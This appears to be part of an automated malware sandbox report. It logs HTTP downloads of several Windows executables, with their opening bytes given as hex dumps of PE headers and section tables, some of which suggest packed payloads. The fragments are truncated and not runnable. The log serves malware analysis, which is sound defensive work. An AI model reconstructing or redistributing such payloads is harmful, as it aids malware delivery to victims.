00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 09:11:18 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 09:11:23 GMTContent-Type: application/octet-streamContent-Length: 3032576Last-Modified: Thu, 19 Dec 2024 08:27:54 GMTConnection: keep-aliveETag: "6763d90a-2e4600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 f0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 32 00 00 04 00 00 3d 99 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d8 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 d8 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d4 05 00 00 00 90 06 00 00 06 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 7a 6f 70 64 61 77 76 77 00 30 2b 00 00 b0 06 00 00 2a 2b 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 63 74 64 61 76 73 6b 00 10 00 00 00 e0 31 00 00 04 00 00 00 20 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 31 00 00 22 00 00 00 24 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 09:11:29 GMTContent-Type: application/octet-streamContent-Length: 1943552Last-Modified: Thu, 19 Dec 2024 08:25:08 GMTConnection: keep-aliveETag: "6763d864-1da800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 5e 03 00 00 00 01 00 00 60 4a 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 4a 00 00 04 00 00 e0 54 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 e0 07 00 6a 00 00 00 00 c0 07 00 6c 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 e1 07 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 07 00 00 10 00 00 00 3c 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 6c 16 00 00 00 c0 07 00 00 08 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 07 00 00 02 00 00 00 54 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 29 00 00 f0 07 00 00 02 00 00 00 56 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 79 72 6d 75 79 70 66 00 30 19 00 00 20 31 00 00 2a 19 00 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 64 64 64 73 73 65 6f 00 10 00 00 00 50 4a 00 00 04 00 00 00 82 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 4a 00 00 22 00 00 00 86 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 09:11:42 GMTContent-Type: application/octet-streamContent-Length: 21504Last-Modified: Wed, 18 Dec 2024 18:13:28 GMTConnection: keep-aliveETag: "676310c8-5400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 70 6d 3b c0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 4a 00 00 00 08 00 00 00 00 00 00 3a 69 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e6 68 00 00 4f 00 00 00 00 80 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 54 68 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 49 00 00 00 20 00 00 00 4a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c 05 00 00 00 80 00 00 00 06 00 00 00 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 69 00 00 00 00 00 00 48 00 00 00 02 00 05 00 e4 36 00 00 70 31 00 00 03 00 02 00 1b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 38 00 00 00 01 00 00 11 73 32 00 00 06 0a 06 28 16 00 00 0a 7d 3c 00 00 04 06 02 7d 3d 00 00 04 06 15 7d 3b 00 00 04 06 7c 3c 00 00 04 12 00 28 01 00 00 2b 06 7c 3c 00 00 04 28 18 00 00 0a 2a 13 30 02 00 50 00 00 00 02 00 00 11 00 7e 02 00 00 04 16 fe 01 0a 06 2c 42 00 72 01 00 00 70 28 19 00 00 0a 00 72 63 00 00 70 28 19 00 00 0a 00 28 05 00 00 06 0b 72 a9 00 00 70 07 28 1a 00 00 0a 28 19 00 00 0a 00 07 28 04 00 00 06 6f 1b 00 00 0a 00 16 28 1c 00 00 0a 00 00 2a 13 30 02 00 38 00 00 00 03 00 00 11 73 2c 00 00 06 0a 06 28 16 00 00 0a 7d 15 00 00 04 06 02 7d 16 00 00 04 06 15 7d 14 00 00 04 06 7c 15 00 00 04 12 00 28 02 00 00 2b 06 7c 15 00 00 04 28 18 00 00 0a 2a 13 30 05 00 48 00 00 00 04 00 00 11 00 73 1d 00 00 0a 0a 1a 8d 2f 00 00 01 0b 16 0c 2b 1c 00 07 08 7e 03 00 00 04 06 7e 03 00 00 04 8e 69 6f 1e 00 00 0a 9a a2 00 08 17 58 0c 08 1a fe 04 0d 09 2d dc 72 cf 00 00 70 07 28 1f 00 00 0a 13 04 2b 00 11 04 2a 13 30 02 00 16
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 09:11:47 GMTContent-Type: application/octet-streamContent-Length: 765568Last-Modified: Tue, 17 Dec 2024 09:46:16 GMTConnection: keep-aliveETag: "67614868-bae80"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 0b 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c a8 01 00 00 10 00 00 00 aa 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 8b 00 00 00 c0 01 00 00 8c 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 22 00 00 00 50 02 00 00 16 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 53 00 00 00 00 53 00 00 00 00 80 02 00 00 02 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 02 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 a0 02 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 19 00 00 00 b0 02 00 00 1a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 86 04 00 00 d0 02 00 00 86 04 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 86 04 00 00 60 07 00 00 86 04 00 00 fa 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 09:11:54 GMTContent-Type: application/octet-streamContent-Length: 776832Last-Modified: Tue, 17 Dec 2024 09:45:14 GMTConnection: keep-aliveETag: "6761482a-bda80"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c a8 01 00 00 10 00 00 00 aa 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 8b 00 00 00 c0 01 00 00 8c 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 22 00 00 00 50 02 00 00 16 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 53 00 00 00 00 53 00 00 00 00 80 02 00 00 02 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 02 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 a0 02 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 19 00 00 00 b0 02 00 00 1a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 9c 04 00 00 d0 02 00 00 9c 04 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 9c 04 00 00 70 07 00 00 9c 04 00 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 09:12:01 GMTContent-Type: application/octet-streamContent-Length: 1885696Last-Modified: Wed, 18 Dec 2024 18:20:46 GMTConnection: keep-aliveETag: "6763127e-1cc600"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 80 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 4a 00 00 04 00 00 25 2d 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 20 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 40 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 7a 78 64 77 79 76 69 00 50 1a 00 00 20 30 00 00 42 1a 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 66 7a 64 6c 64 69 67 00 10 00 00 00 70 4a 00 00 04 00 00 00 a0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 4a 00 00 22 00 00 00 a4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
